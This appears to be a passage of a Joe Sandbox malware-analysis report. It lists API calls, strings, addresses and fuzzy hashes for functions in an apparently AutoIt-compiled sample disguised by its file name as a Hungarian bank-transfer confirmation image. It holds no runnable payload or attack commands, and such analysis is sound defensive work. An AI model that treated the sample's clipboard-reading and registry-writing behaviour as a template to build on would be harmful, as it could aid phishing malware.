                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                          • String ID:
                                                                                                          • API String ID: 1582027408-0
                                                                                                          • Opcode ID: 90e9b5fb4d37338391ab9497a8c5b87626992c47cd1f836db1c6882af3371814
                                                                                                          • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                                                          • Opcode Fuzzy Hash: 90e9b5fb4d37338391ab9497a8c5b87626992c47cd1f836db1c6882af3371814
                                                                                                          • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                                                          APIs
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseConnectCreateRegistry
                                                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                          • API String ID: 3217815495-966354055
                                                                                                          • Opcode ID: 83ecef62884074c6d9a9244c2a653ecf9311b46b4a35863410e3534dee55722b
                                                                                                          • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                                                          • Opcode Fuzzy Hash: 83ecef62884074c6d9a9244c2a653ecf9311b46b4a35863410e3534dee55722b
                                                                                                          • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                                                          APIs
                                                                                                          • GetCursorPos.USER32(?), ref: 004566AE
                                                                                                          • GetDesktopWindow.USER32 ref: 004566C3
                                                                                                          • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                                                          • DestroyWindow.USER32(?), ref: 00456746
                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                                                          • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                                                          • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                                                          • IsWindowVisible.USER32(?), ref: 0045682C
                                                                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                                                          • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00456873
                                                                                                          • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                                                          • CopyRect.USER32(?,?), ref: 004568BE
                                                                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                          • String ID: ($,$tooltips_class32
                                                                                                          • API String ID: 225202481-3320066284
                                                                                                          • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                          • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                                                          • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                                                          • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                                                          APIs
                                                                                                          • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                                                          • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                                                          • CloseClipboard.USER32 ref: 0046DD0D
                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                                                          • CloseClipboard.USER32 ref: 0046DD41
                                                                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                                                          • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                                                          • CloseClipboard.USER32 ref: 0046DD99
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 15083398-0
                                                                                                          • Opcode ID: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                          • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                                                          • Opcode Fuzzy Hash: 5d52f7a8e2fbd0ab087c8c139685d9916ac200a5779b15fccd04bfb456a25eb2
                                                                                                          • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                                                          APIs
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                                                          • GetClientRect.USER32(?,?), ref: 00471D05
                                                                                                          • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                                                          • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                                                          • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                                                          • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                                                          • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                                                          • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                                                          • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                                                          • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                                                          • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                                                          • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                                                          • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                                                          • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                                                          • String ID: @$AutoIt v3 GUI
                                                                                                          • API String ID: 867697134-3359773793
                                                                                                          • Opcode ID: f09f2a2b6cca380f9ede19f0122a88a3538efa9583e86f2b72b74e79f194809b
                                                                                                          • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                                                          • Opcode Fuzzy Hash: f09f2a2b6cca380f9ede19f0122a88a3538efa9583e86f2b72b74e79f194809b
                                                                                                          • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                          • API String ID: 1503153545-1459072770
                                                                                                          • Opcode ID: 83765b9f55f09713808f06d0c449f1bfafbb30469e25804f018cc04f8550c6ec
                                                                                                          • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                                                          • Opcode Fuzzy Hash: 83765b9f55f09713808f06d0c449f1bfafbb30469e25804f018cc04f8550c6ec
                                                                                                          • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsicoll$__wcsnicmp
                                                                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                                                          • API String ID: 790654849-32604322
                                                                                                          • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                          • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                                                          • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                                                          • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b138b5d80077f47550a94c6977eca8a0db71283c63b239a1866a5e270e527fd4
                                                                                                          • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                                                          • Opcode Fuzzy Hash: b138b5d80077f47550a94c6977eca8a0db71283c63b239a1866a5e270e527fd4
                                                                                                          • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                                                          APIs
                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window
                                                                                                          • String ID: 0
                                                                                                          • API String ID: 2353593579-4108050209
                                                                                                          • Opcode ID: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                          • Instruction ID: 06508bea8339de1511a48146ac1d08a96458f0089f80555ee302a354f7131a6f
                                                                                                          • Opcode Fuzzy Hash: b0df0e29545e706fc7615ccb9c436c62dbee4145767baabea16aca18bd76baa2
                                                                                                          • Instruction Fuzzy Hash: 35B18BB0204341ABF324CF24CC89BABBBE4FB89744F14491EF591962D1DBB8A845CB59
                                                                                                          APIs
                                                                                                          • GetSysColor.USER32(0000000F), ref: 0044A05E
                                                                                                          • GetClientRect.USER32(?,?), ref: 0044A0D1
                                                                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A0E9
                                                                                                          • GetWindowDC.USER32(?), ref: 0044A0F6
                                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0044A108
                                                                                                          • ReleaseDC.USER32(?,?), ref: 0044A11B
                                                                                                          • GetSysColor.USER32(0000000F), ref: 0044A131
                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0044A140
                                                                                                          • GetSysColor.USER32(0000000F), ref: 0044A14F
                                                                                                          • GetSysColor.USER32(00000005), ref: 0044A15B
                                                                                                          • GetWindowDC.USER32(?), ref: 0044A1BE
                                                                                                          • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A1CB
                                                                                                          • GetPixel.GDI32(00000000,?,00000000), ref: 0044A1E4
                                                                                                          • GetPixel.GDI32(00000000,00000000,?), ref: 0044A1FD
                                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 0044A21D
                                                                                                          • ReleaseDC.USER32(?,00000000), ref: 0044A229
                                                                                                          • SetBkColor.GDI32(?,00000000), ref: 0044A24C
                                                                                                          • GetSysColor.USER32(00000008), ref: 0044A265
                                                                                                          • SetTextColor.GDI32(?,00000000), ref: 0044A270
                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 0044A282
                                                                                                          • GetStockObject.GDI32(00000005), ref: 0044A28A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                          • String ID:
                                                                                                          • API String ID: 1744303182-0
                                                                                                          • Opcode ID: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                          • Instruction ID: 0380b5c53d8a23173c1b90063483f03488caaf4f58ae5d2001aea5c06c56dff4
                                                                                                          • Opcode Fuzzy Hash: e73dd003506282a75ec33c48a00615cd632731ac0e25c139f5641f86d6275693
                                                                                                          • Instruction Fuzzy Hash: E6612531140101ABE7109F78CC88BAB7764FB46320F14876AFD659B3D0DBB49C529BAA
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,004164DE), ref: 00417C28
                                                                                                          • __mtterm.LIBCMT ref: 00417C34
                                                                                                            • Part of subcall function 004178FF: TlsFree.KERNEL32(00000017,00417D96,?,004164DE), ref: 0041792A
                                                                                                            • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000000,00000000,00410E44,?,00417D96,?,004164DE), ref: 004181B8
                                                                                                            • Part of subcall function 004178FF: _free.LIBCMT ref: 004181BB
                                                                                                            • Part of subcall function 004178FF: DeleteCriticalSection.KERNEL32(00000017,00410E44,?,00417D96,?,004164DE), ref: 004181E2
                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00417C4A
                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00417C57
                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00417C64
                                                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00417C71
                                                                                                          • TlsAlloc.KERNEL32(?,004164DE), ref: 00417CC1
                                                                                                          • TlsSetValue.KERNEL32(00000000,?,004164DE), ref: 00417CDC
                                                                                                          • __init_pointers.LIBCMT ref: 00417CE6
                                                                                                          • __calloc_crt.LIBCMT ref: 00417D54
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00417D80
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                          • API String ID: 4163708885-3819984048
                                                                                                          • Opcode ID: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                          • Instruction ID: ca22d9d2e1075830452d52834408fe47c465c3b6ac2468b12672dd77d4d5938c
                                                                                                          • Opcode Fuzzy Hash: b664ad2f65df639e4a6a12b7ff6e2ff430dd15d20f416fce335d42a987fa1153
                                                                                                          • Instruction Fuzzy Hash: D5315A75808710DECB10AF75BD0865A3EB8BB60764B12093FE914932B0DB7D8881CF9C
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsicoll$IconLoad
                                                                                                          • String ID: blank$info$question$stop$warning
                                                                                                          • API String ID: 2485277191-404129466
                                                                                                          • Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
                                                                                                          • Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
